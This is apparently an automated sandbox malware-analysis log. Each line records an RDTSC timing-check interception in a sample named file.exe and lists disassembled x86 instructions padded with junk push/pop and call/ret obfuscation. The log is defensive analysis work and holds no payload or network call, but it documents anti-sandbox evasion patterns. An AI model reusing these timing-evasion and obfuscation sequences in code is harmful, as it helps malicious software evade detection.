                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10869D5 second address: 10869D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10869D9 second address: 10869E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079EAF second address: 1079EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086D37 second address: 1086D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086D3C second address: 1086D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F08ED2F2E94h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F08ED2F2E8Ch 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B26E second address: 108B278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F08ED2385E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B278 second address: 108B28B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F08ED2F2E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B7C2 second address: 108B7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B7C6 second address: 108B7CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B7CC second address: 108B7D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A85C second address: 108A865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8A4 second address: 108B8AE instructions: 0x00000000 rdtsc 0x00000002 je 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8AE second address: 108B8B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8B3 second address: 108B8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8B9 second address: 108B8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F08ED2F2E8Ah 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8D1 second address: 108B8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8D7 second address: 108B8EC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F08ED2F2E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8EC second address: 108B8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B8F0 second address: 108B90D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F08ED2F2E92h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B90D second address: 108B913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CB84 second address: 108CB9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E92h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CB9C second address: 108CBA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091302 second address: 1091313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F08ED2F2E8Ch 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091313 second address: 109131D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F08ED2385E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10578D4 second address: 10578E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F08ED2F2E86h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10578E1 second address: 10578EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F08ED2385E6h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090755 second address: 109076C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F08ED2F2E86h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F08ED2F2E86h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109076C second address: 1090770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090BB0 second address: 1090BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090FE2 second address: 1090FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10911A7 second address: 10911B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F08ED2F2E8Bh 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10911B9 second address: 10911C3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F08ED2385F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10911C3 second address: 10911C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092EEE second address: 1092EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093047 second address: 109304B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093615 second address: 1093619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093619 second address: 109361F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093ABC second address: 1093ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F08ED2385F4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093ADD second address: 1093AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093AE2 second address: 1093AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F08ED2385E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093AEC second address: 1093AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093B8D second address: 1093B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093B91 second address: 1093BB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F08ED2F2E88h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F08ED2F2E8Ch 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094165 second address: 109416C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094668 second address: 10946BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F08ED2F2E88h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push ecx 0x00000028 mov di, A8B6h 0x0000002c pop edi 0x0000002d push 00000000h 0x0000002f js 00007F08ED2F2E8Bh 0x00000035 and si, 8712h 0x0000003a push 00000000h 0x0000003c mov si, 3548h 0x00000040 xchg eax, ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1096B0E second address: 1096B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F08ED2385EEh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F08ED2385EEh 0x00000011 nop 0x00000012 mov esi, dword ptr [ebp+122D1CB7h] 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D2D75h], edi 0x00000020 sbb di, 1787h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F08ED2385E8h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 mov esi, dword ptr [ebp+122D3C89h] 0x00000047 push eax 0x00000048 pushad 0x00000049 jne 00007F08ED2385E8h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10968E4 second address: 10968FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E95h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10968FD second address: 1096901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097412 second address: 1097416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099643 second address: 109965E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109965E second address: 1099662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099662 second address: 1099666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099666 second address: 10996E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F08ED2F2E88h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 add dword ptr [ebp+122D2BCBh], ebx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F08ED2F2E88h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 push 00000000h 0x00000046 mov dword ptr [ebp+122D2EC0h], esi 0x0000004c xchg eax, ebx 0x0000004d jc 00007F08ED2F2EA5h 0x00000053 pushad 0x00000054 jnp 00007F08ED2F2E86h 0x0000005a jmp 00007F08ED2F2E97h 0x0000005f popad 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10993BF second address: 10993C9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08ED2385ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C8FA second address: 109C8FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C8FF second address: 109C964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2385EDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f jmp 00007F08ED2385F3h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop eax 0x00000019 popad 0x0000001a nop 0x0000001b sub bx, 01DCh 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F08ED2385E8h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c push 00000000h 0x0000003e or di, B881h 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C964 second address: 109C968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C968 second address: 109C975 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109CAD3 second address: 109CB68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jg 00007F08ED2F2E8Ch 0x00000011 pop edi 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F08ED2F2E88h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov ebx, ecx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F08ED2F2E88h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 0000001Ah 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 mov bh, cl 0x00000059 mov ebx, 55098B78h 0x0000005e mov eax, dword ptr [ebp+122D05BDh] 0x00000064 mov bx, dx 0x00000067 push FFFFFFFFh 0x00000069 mov ebx, dword ptr [ebp+122D3B19h] 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109CB68 second address: 109CB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109CB6E second address: 109CB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F424 second address: 104F42A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0E75 second address: 10A0E7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0E7C second address: 10A0EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F08ED2385E8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov bx, si 0x00000027 push 00000000h 0x00000029 call 00007F08ED2385EDh 0x0000002e add ebx, 27314D9Ah 0x00000034 pop ebx 0x00000035 push 00000000h 0x00000037 mov ebx, dword ptr [ebp+122D2CB1h] 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F08ED2385F1h 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0EDE second address: 10A0EE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0EE2 second address: 10A0EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0EE8 second address: 10A0EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F08ED2F2E86h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1E82 second address: 10A1E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edi 0x00000007 pushad 0x00000008 jmp 00007F08ED2385EDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1E99 second address: 10A1EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D2B73h], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F08ED2F2E88h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b or di, 1491h 0x00000030 mov di, dx 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F08ED2F2E92h 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1001 second address: 10A1005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1EE7 second address: 10A1EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A10E0 second address: 10A10ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5156 second address: 10A51AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, ecx 0x0000000f jnl 00007F08ED2F2E92h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F08ED2F2E88h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 sub di, 041Ah 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+122D2E37h], ebx 0x0000003e xchg eax, esi 0x0000003f push ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 js 00007F08ED2F2E86h 0x00000048 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A52EF second address: 10A52FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EBh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A77EB second address: 10A7869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08ED2F2E97h 0x00000008 jmp 00007F08ED2F2E91h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F08ED2F2E88h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d pushad 0x0000002e mov si, dx 0x00000031 mov ax, 2BF4h 0x00000035 popad 0x00000036 push 00000000h 0x00000038 jmp 00007F08ED2F2E8Eh 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 sub dword ptr [ebp+122D1E1Bh], eax 0x00000046 pop ebx 0x00000047 push eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A7869 second address: 10A7888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F08ED2385F7h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8802 second address: 10A8808 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AADBF second address: 10AADC4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A89A0 second address: 10A89BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F08ED2F2E92h 0x0000000f rdtsc
